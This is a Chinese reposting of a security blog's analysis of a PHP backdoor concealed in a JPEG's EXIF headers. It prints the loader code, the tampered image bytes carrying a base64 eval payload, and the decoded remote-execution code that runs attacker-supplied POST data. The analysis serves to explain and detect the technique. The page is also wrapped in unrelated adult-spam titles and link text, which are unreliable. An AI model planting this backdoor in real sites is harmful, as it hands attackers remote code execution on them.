成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

一種隱藏在JPG圖片EXIF中的后門

安全 黑客攻防 應用安全
這是一個非常有趣的后門,它并沒有依靠正常模式去隱藏起內容(比如 base64/gzip 編碼),但是它卻把自己的數據隱藏在JPEG圖片的EXIT頭部中了。它也使用exif_read_data和preg_replace兩個PHP函數來讀取EXIF頭部和執行。

這是一個非常有趣的后門,它并沒有依靠正常模式去隱藏起內容(比如 base64/gzip 編碼),但是它卻把自己的數據隱藏在JPEG圖片的EXIT頭部中了。它也使用exif_read_data和preg_replace兩個PHP函數來讀取EXIF頭部和執行。

技術細節

這個后門可分為兩部分。第一部分是 exif_read_data 函數讀取圖片頭部,preg_replace 函數來執行內容。下面是我們在被攻破網站上發現的代碼:

$exif = exif_read_data('/homepages/clientsitepath/images/stories/food/bun.jpg');
preg_replace($exif['Make'],$exif['Model'],'');

這兩個函數本身是無害滴。exif_read_data 函數常用來讀取圖片,preg_replace 函數是替代字符內容。不過,preg_replace 函數函數有個隱藏并微妙的選項,如果你傳入 “/e”,它會執行 eval() 中的內容,就不是去查詢/替代了。

所以我們在查看bun.jpg文件時,發現后門的第二部分:

ÿØÿà^@^PJFIF^@^A^B^@^@d^@d^@^@ÿá^@¡Exif^@^@II*^@^H^@^@^@^B^@^O^A^B^@^F^@^@^@&^@^@^@^P^A^B^@m^@^@^@,^@^@^@^@^@^@^@/.*/e^@ eval ( base64_decode("aWYgKGl zc2V0KCRfUE9TVFsie noxIl0pKSB7ZXZhbChzd
HJpcHNsYXNoZXMoJF9QT1NUWyJ6ejEiXSkpO30='));
@ÿì^@^QDucky^@^A^@^D^@^@^@<^@^@ÿî^@^NAdobe^

這個文件用以常見的頭部開始,但是在 ”make” 頭部中混入了奇怪的關鍵字 ”/.*/e” 。有了這個執行修飾符, preg_replace 會執行 eval() 中傳入的任意內容。

事情變得開始有趣了……

如果咱們繼續來看看 EXIF 數據,我們能發現, “eval ( base64_decode”隱藏在 ”Model“ 頭部。把這些放在一起看,咱們就知道怎么回事了。攻擊者是從 EXIF 中讀取 Make 和 Model 頭部信息,然后傳入到 preg_replace 函數。只要我們修改 $exif['Make'] 和 $exif['Model'] ,就得到了最終的后門。

preg_replace ("/.*/e", ,"@ eval ( base64_decode("aWYgKGl ...");

解碼后我們可以看到是執行 $_POST["zz1"] 提供的內容。完整解碼后的后面在這里。

if (isset( $_POST["zz1"])) { eval (stripslashes( $_POST["zz1"]..

隱藏惡意軟件

另外一個有意思的是,雖然 bun.jpg 和其他圖片文件被修改了,但然后能加載并正常工作。實際上,在這些被攻破的站點,攻擊者修改了站點上一個合法并之前就存在的圖片。這是一種奇特的隱藏惡意軟件的方法。

原文地址:http://blog.sucuri.net/2013/07/malware-hidden-inside-jpg-exif-headers.html

責任編輯:藍雨淚 來源: FreebuF
相關推薦

2015-02-28 10:52:05

2012-08-16 09:39:04

2016-10-26 09:12:58

2009-07-25 22:03:28

2011-06-13 09:59:21

2021-01-15 13:27:50

竊密腳本CSS惡意代碼

2016-11-21 11:43:11

Python

2018-05-09 10:40:15

云存儲數據對象存儲

2023-05-04 07:11:29

2016-12-02 10:05:49

Python彩蛋

2018-04-24 11:06:18

云遷移數據遷移數據庫

2021-07-09 10:29:50

云計算云計算環境云應用

2019-08-29 07:51:26

2021-04-21 13:44:50

惡意代碼網絡釣魚攻擊

2022-11-15 10:05:26

2014-05-16 10:44:57

設計交互設計

2020-11-06 00:00:00

PHP技巧后門

2020-12-23 10:10:23

Pythonweb代碼

2022-06-22 09:44:41

Python文件代碼

2022-07-07 10:33:27

Python姿勢代碼
點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 91久久电影 | 蜜桃特黄a∨片免费观看 | h视频免费在线观看 | 91大神在线资源观看无广告 | 国产精品福利在线观看 | 国产精品久久久久久久一区二区 | 日韩精品在线看 | 99精品国产一区二区青青牛奶 | 在线免费观看a级片 | 国内自拍视频在线观看 | 91久久| 欧美精品一区二区三区四区 在线 | 久草网址 | 欧美日韩国产精品一区 | 黄色大片视频 | 欧美精品一区在线发布 | 国产一级视频 | 北条麻妃国产九九九精品小说 | 日韩视频一区在线观看 | 日韩视频在线观看一区二区 | 久热精品在线观看视频 | 欧美激情区 | 欧美国产日韩精品 | 成人国产一区二区三区精品麻豆 | 欧美一级观看 | 免费视频一区二区 | 中文字幕在线观看一区二区 | 国产成人精品免高潮在线观看 | 免费看黄视频网站 | 欧美日韩一区在线播放 | 欧美视频一区二区三区 | 欧美日韩精品一区二区三区蜜桃 | 情侣酒店偷拍一区二区在线播放 | 日本亚洲一区 | 农村真人裸体丰满少妇毛片 | 一级特黄a大片 | 欧美日韩精品一区二区三区四区 | 男女精品久久 | 国产免费看 | 国产国语精品 | 国产一区二区三区在线 |